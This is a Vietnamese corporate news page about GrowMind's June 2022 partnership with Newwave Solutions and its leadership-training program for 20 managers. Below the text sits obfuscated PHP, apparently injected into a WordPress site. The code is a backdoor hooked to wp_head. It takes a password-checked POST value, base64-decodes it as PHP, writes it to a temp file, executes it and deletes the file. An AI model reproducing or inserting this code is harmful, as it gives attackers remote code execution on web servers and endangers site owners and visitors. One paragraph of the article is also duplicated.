HỢP TÁC NÂNG CAO NĂNG LỰC NGUỒN LỰC CỦA TỔ CHỨC TẠI NEWWAVE SOLUTIONS

Lễ ký kết hợp tác giữa GrowMind và Newwave Solutions

Ngày 9/6/2022, GrowMind và Newwave Solutions đã có buổi Lễ ký kết hợp tác, đánh dấu một bước tiến mới giữa hai công ty.
Đây là dấu mốc quan trọng cho cả hai đơn vị để chính thức trở thành đối tác chiến lược, tiếp tục cùng nhau triển khai các chương trình đào tạo nâng cao năng lực quản trị và phát triển nguồn nhân lực.

Chương trình Phát triển Năng lực lãnh đạo – Thủ lĩnh Newwave

Mở đầu cho chuỗi hợp tác nâng cao năng lực nguồn lực tại Newwave Solutions, GrowMind đã triển khai Chương trình phát triển năng lực lãnh đạo cho 20 anh chị Quản lý với tên gọi Thủ lĩnh Newwave. Chương trình diễn ra trong 10 tuần và 2 ngày Kick-off chương trình.

THU LINH NEWWAVE

Những khởi động đầu tiên

Trong 02 ngày Kickoff, các nhà Quản lý của Newwave tham gia nhiều hoạt động học tập và thảo luận khác nhau để cùng:
 • Tìm ra chân dung Thủ lĩnh Newwave
 • Nhận thức bản thân và Khám phá tiềm năng lãnh đạo trong mỗi người
 • Nuôi dưỡng tư duy phát triển tại Newwave Solutions
 • Thực hành đọc sách cho người bận rộn
Đây là cơ hội để các nhà Quản lý có dịp nhìn nhận nghiêm túc về nghề Quản lý, có những nhận thức mới về bản thân – nghề nghiệp cũng như học hỏi từ chính đồng nghiệp của mình.
Đây là cơ hội để các nhà Quản lý có dịp nhìn nhận nghiêm túc về nghề Quản lý, có những nhận thức mới về bản thân – nghề nghiệp cũng như học hỏi từ chính đồng nghiệp của mình.

Hành trình học tập 2.5 tháng

Kết thúc 02 ngày Kickoff, các thành viên chính thức bước vào giai đoạn học tập 2.5 tháng đầy thách thức để trang bị các kiến thức/kỹ năng nền tảng về nghề quản lý, xây dựng thói quen học tập chủ động và hành dụng linh hoạt, và xa hơn nữa là từng bước xây dựng và lan tỏa văn hóa học tập trong các đội nhóm, đơn vị tại Newwave Solutions.
 • 272 thử nghiệm
 • 241 lượt book reflection
 • 2 thử thách dài hơi:
  • 14 ngày – Mỗi ngày một trang sách
  • 14 ngày thay đổi bản thân
 • 2 đề tài lớn:
  • Thử làm giáo sư
  • 08 giờ huấn luyện
Và trên tất cả đó là những sự thay đổi trong nhận thức, kỹ năng về “nghề” quản lý/ lãnh đạo.
20 Thủ lĩnh Newwave đã hoàn thành xuất sắc 8 module về nâng cao hiệu suất cá nhân và các kỹ năng quản lý thiết yếu, ghi nhiều kỷ lục mới cho các chương trình Professional Manager mà GrowMind đã triển khai.
Nhìn lại hành trình nâng cao năng lực lãnh đạo của các Quản lý của Newwave Solutions tại đâynang cao nang luc tai Newwave

GrowMind – Đồng kiến tạo các công ty tiến bộ và hạnh phúc!

Theo dõi thêm các hoạt động từ GrowMind tại đây!

1
Bạn cần hỗ trợ?
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}